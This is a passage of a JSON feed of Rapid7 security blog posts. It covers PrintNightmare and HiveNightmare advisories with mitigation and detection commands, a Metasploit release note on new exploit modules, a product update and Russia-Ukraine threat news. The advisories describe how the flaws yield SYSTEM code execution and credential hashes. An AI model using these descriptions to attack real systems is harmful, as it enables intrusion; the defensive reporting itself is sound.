actions inside of Ukraine,\u201d FCC seeks comment on vulnerabilities threatening the Border Gateway Protocol (BGP) that is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it has no specific, credible threat against the U.S. at this time. It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * ******An Anonymous-affiliated hacking group claims to have hacked a branch Russian Military and Rosatom, the Russian State Atomic Energy Corporation****.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked access to the phone directory of the military prosecutor's office of the southern military district of Russia, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * ******A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military****.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_ \n\n\n * ******An Anonymous hacktivist associated group took down the popular Russian news website lenta.ru******\n\nAs part of the OpRussia cyber-attack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T18:55:38", "description": "## PrintNightmare\n\n\n\nRapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), have added a new module for [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\\SYSTEM`.\n\nBecause Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.\n\n[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. For more information and a full timeline, see [Rapid7\u2019s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!\n\n## NSClient++\n\nGreat work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged windows account to gain admin access on a windows system and start a shell.\n\nFor this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.\n\n## New module content (2)\n\n * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) \\- A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the `SYSTEM` user.\n\n * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.\n\n## Enhancements and features\n\n * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) \\- This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).\n\n## Bugs fixed\n\n * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) \\- A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.\n * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `apport_abrt_chroot_priv_esc` module where if the `apport-cli` binary was not in the PATH the check method would fail.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)\n * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the\n\n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-07-09T17:53:41", "type": "rapid7blog", "title": "Metasploit Wrap-up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T17:53:41", "id": "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "href": "https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T14:55:46", "description": "\n\n**Vulnerability note:** This blog originally referenced CVE-2020-1675, but members of the community noted the week of June 29 that the publicly available exploits that purported to exploit CVE-2021-1675 may in fact have been targeting a new vulnerability in the same function as CVE-2021-1675. This was later confirmed, and Microsoft issued a new CVE for what the research community originally thought was CVE-2021-1675. Defenders should now follow guidance and remediation information on the new vulnerability identifier,[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), instead.\n\nOn June 8, 2021, Microsoft released an advisory and patch for [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) (\u201cPrintNightmare\u201d), a critical vulnerability in the Windows Print Spooler. Although [originally classified](<https://www.rapid7.com/blog/post/2021/06/08/patch-tuesday-june-2021/>) as a privilege escalation vulnerability, security researchers have demonstrated that the vulnerability allows authenticated users to gain remote code execution with SYSTEM-level privileges. On June 29, 2021, as proof-of-concept exploits for the vulnerability began circulating, security researchers discovered that a vulnerability they thought to be CVE-2021-1675 was still exploitable on some systems that had been patched. As of July 1, at least three different proof-of-concept exploits [had been made public](<https://github.com/afwu/PrintNightmare>).\n\nRapid7 researchers confirmed that public exploits worked against fully patched Windows Server 2019 installations as of July 1, 2021. The vulnerable service is enabled by default on Windows Server, with the exception of Windows Server Core. Therefore, it is expected that in the vast majority of enterprise environments, Windows systems are vulnerable to remote code execution by authenticated attackers.\n\nThe vulnerability is in the `RpcAddPrinterDriver` call of the Windows Print Spooler. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB. The client then allocates a `DRIVER_INFO_2` object and initializes a `DRIVER_CONTAINER` object that contains the allocated `DRIVER_INFO_2` object. The `DRIVER_CONTAINER` object is then used within the call to `RpcAddPrinterDriver` to load the driver. This driver may contain arbitrary code that will be executed with SYSTEM privileges on the victim server. This command can be executed by any user who can authenticate to the Spooler service.\n\n## Updates\n\n**9 July 2021**: Microsoft [released revised guidance on CVE-2021-34527](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) the evening of July 8. According to the Microsoft Security Response Center, the out-of-band security update "is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration." This is consistent with Microsoft's emphasis earlier in the week that the out-of-band update effectively remediates CVE-2021-34527 **as long as Point and Print is not enabled.**\n\nThe [updated guidance from July 8, 2021](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) also contains revisions to the registry keys that must be set to `0` (or must not be present) in order to ensure that Point and Print is disabled in customer environments. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` and\n * `NoWarningNoElevationOnUpdate = 0`\n\n**However, as of July 8, 2021, one of the registry keys that must be set to a 0 (zero) value has changed.** Current guidance is that Point and Print can be disabled by setting the following registry keys to `0` (or ensuring they are not present):\n\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n\nWe have updated the `Mitigation Guidance` section in this post to reflect the latest remediation guidance from Microsoft. Further details can still be found in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\n**7 July 2021**: Microsoft released out-of-band updates for some (but not all) versions of Windows the evening of July 6, 2021. According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds and a patch remains unavilable at this time. \nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. We advise folowing one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that the `RpcAddPrinterDriver` is not the only vulnerable function, and the Win32 `AddPrinterDriverEx` function will also work correctly.Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:** \nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a printer server. Administrators can install both a signed or unsigned printer driver on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users will be either administrators or non-administrators. Delegates will no longer be honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. Dedicated print servers may still be vulnerable if the spooler is not stopped. Microsoft [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since the active directory has no way to remove old queues that no longer exist unless the spooler service is running on at least one domain controller in each site. However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd:\n \n \n net stop spooler\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' | Select-String -InputObject {$_.message} -Pattern 'The print spooler failed to load a plug-in module'\n \n \n \n Get-WinEvent -FilterHashtable @{Logname='Microsoft-Windows-PrintService/Operational';ID=316} | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the two registry keys detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. Checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally ensure that Point and Print has been disabled in customer environments. InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-31T08:56:21", "description": "\n\nOn Monday, July 19, 2021, community security researchers began [reporting](<https://twitter.com/jonasLyk/status/1417205166172950531>) that the Security Account Manager (SAM) file on Windows 10 and 11 systems was READ-enabled for all local users. The SAM file is used to store sensitive security information, such as hashed user and admin passwords. READ enablement means attackers with a foothold on the system can use this security-related information to escalate privileges or access other data in the target environment.\n\nOn Tuesday, July 20, Microsoft issued an out-of-band advisory for this vulnerability, which is now tracked as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). As of July 22, 2021, the vulnerability has been confirmed to affect Windows 10 version 1809 and later. A public proof-of-concept is available that allows non-admin users to retrieve all registry hives. Researcher Kevin Beaumont has also [released a demo](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>) that confirms CVE-2021-36934 can be used to obtain local hashes and pass them to a remote machine, achieving remote code execution as SYSTEM on arbitrary targets (in addition to privilege escalation). The security community has christened this vulnerability \u201cHiveNightmare\u201d and \u201cSeriousSAM.\u201d\n\nCERT/CC [published in-depth vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>) on CVE-2021-36934, which we highly recommend reading. Their analysis reveals that starting with Windows 10 build 1809, the BUILTIN\\Users group is given RX permissions to files in the `%windir%\\system32\\config` directory. If a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\n**There is no patch for CVE-2021-36934 as of July 21, 2021.** Microsoft has released workarounds for Windows 10 and 11 customers that mitigate the risk of immediate exploitation\u2014we have reproduced these workarounds in the `Mitigation Guidance` section below. Please note that Windows customers must **BOTH** restrict access and delete shadow copies to prevent exploitation of CVE-2021-36934. We recommend applying the workarounds on an emergency basis.\n\n## Mitigation Guidance\n\n**1\\. Restrict access to the contents of `%windir%\\system32\\config`:**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\n**2\\. Delete Volume Shadow Copy Service (VSS) shadow copies:**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point if desired.\n\n**Windows 10 and 11 users must apply both workarounds to mitigate the risk of exploitation.** Microsoft has noted that deleting shadow copies may impact restore operations, including the ability to restore data with third-party backup applications.\n\nThis story is developing quickly. We will update this blog with new information as it becomes available.\n\n## Updates\n\n**July 27, 2021:** Microsoft has **removed Windows Server 2019 and Windows Server 20H2** from the list of versions affected by CVE-2021-36934.\n\n**July 22, 2021:** Microsoft added Windows Server 2019 and Windows Server 20H2 to the [list of affected versions](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>).\n\n## Resources\n\n * [Microsoft advisory for 